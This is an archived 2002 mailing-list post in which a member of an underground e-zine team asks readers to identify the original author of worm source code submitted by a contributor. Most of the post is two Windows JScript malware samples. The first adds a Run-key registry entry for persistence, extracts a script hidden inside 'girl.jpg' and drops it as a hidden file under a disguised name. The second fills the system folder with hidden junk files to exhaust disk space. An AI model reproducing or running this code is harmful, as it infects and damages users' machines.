Hi! Do you recognize this source code? Can you tell which is the real/original author? I explain: I am a member of the Raregazz Team, we produce (!) series of underground-related articles. On the 18th edition, a non-member send us an article which was half-stolen from another author (not well known either of them). Now, he is sending us another article, a source-code explanation for a worm. This source code makes me remember of someone else's... So, I would like to find: a) the original author or at least b) know if this source is not an original (i.e is stolen) Thank you! var ob, ws, ws2, g, g2, t, yu, ly, f, f2; ob = new ActiveXObject("Scripting.FileSystemObject"); ws = WScript.CreateObject ("WScript.Shell"); n = ob.GetSpecialFolder(1)+"\\"; yu = ran(); ly = n+yu+".js"; mai(); function mai(){ ws2 = ws.RegRead("HKCU\\Control Panel\\Desktop\\MenuShowDelay"); if (ws2 != "auto"){ ws.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"+yu, l y, "REG_SZ"); ws.RegWrite("HKCU\\Control Panel\\Desktop\\MenuShowDelay", "auto", "REG_SZ"); g = ob.GetFile("girl.jpg"); f = g.OpenAsTextStream(1, -2); g2 = f.ReadAll(); g2 = g2.substring(31029, 32457); t = ob.OpenTextFile(ly, 2, true); t.Write(g2); t.Close(); f2 = ob.GetFile(ly); f2.attributes = f2.attributes + 4; } } function ran(){ rr = new Array(15); rr[0] ="$mstask"; rr[1] ="$command"; rr[2] ="$explorer"; rr[3] ="$alg"; rr[4] ="$logon"; rr[5] ="$ie"; rr[6] ="$icq"; rr[7] ="$win"; rr[8] ="$system"; rr[9] ="$sys"; rr[10] ="$scanreg"; rr[11] ="$yahoo"; rr[12] ="$msn"; rr[13] ="$clock "; rr[14] ="$logger"; rr[15] ="$yl"; var irr = rr[parseInt(Math.round(Math.random()*15))]; return (irr); } /* second source code */ var ob, f, f2, t, t2, n, w, ry0, ry1; ob = new ActiveXObject("Scripting.FileSystemObject"); t = new Date(); t2 = t.getHours()+t.getMinutes()+t.getSeconds(); n = ob.GetSpecialFolder(1)+"\\"; wrote(); function wrote(){ ry0 = ran(); ry1 = ran2(); w = n+ry0+t2+ry1; f = ob.OpenTextFile(w, 2, true); for (q = 0; q < 1000; q++){rew();} f.Close(); f2 = ob.GetFile(w); f2.attributes = f2.attributes + 4; } function ran(){ rr = new Array(15); rr[0] ="mstask."; rr[1] ="command."; rr[2] ="explorer."; rr[3] ="alg."; rr[4] = "logon."; rr[5] ="ie."; rr[6] ="leeme."; rr[7] ="win."; rr[8] ="system."; rr[9] ="sys."; rr[10] ="scanreg."; rr[11] ="icq."; rr[12] ="msn."; rr[13] ="clock."; rr[14] ="logger."; rr[15] ="yl."; var irr = rr[parseInt(Math.round(Math.random()*15))]; return (irr); } function ran2(){ rr2 = new Array(15); rr2[0] =".exe"; rr2[1] =".doc"; rr2[2] =".com"; rr2[3] =".bat"; rr2[4] =".tmp"; rr2[5] =".xls"; rr2[6] =".ini"; rr2[7] =".inf"; rr2[8] =".vxd"; rr2[9] =".dll" ; rr2[10] =".htm"; rr2[11] =".cpl"; rr2[12] =".sys"; rr2[13] =".dat"; rr2[14] = ".yl"; rr2[15] =".hex"; var irr2 = rr2[parseInt(Math.round(Math.random()*15))]; return (irr2); } function rew(){ f.Write(":::: GusanoDisk Y v5.recover ::::"); f.Write("Creado :: "+ t2); f.WriteBlankLines(90); for (q = 0; q < 900; q++){f.Write("GusanoDisk Y by HeX. Gracias por sus megabytes."); } }
This archive was generated by hypermail 2b30 : Sun Mar 17 2002 - 21:24:18 PST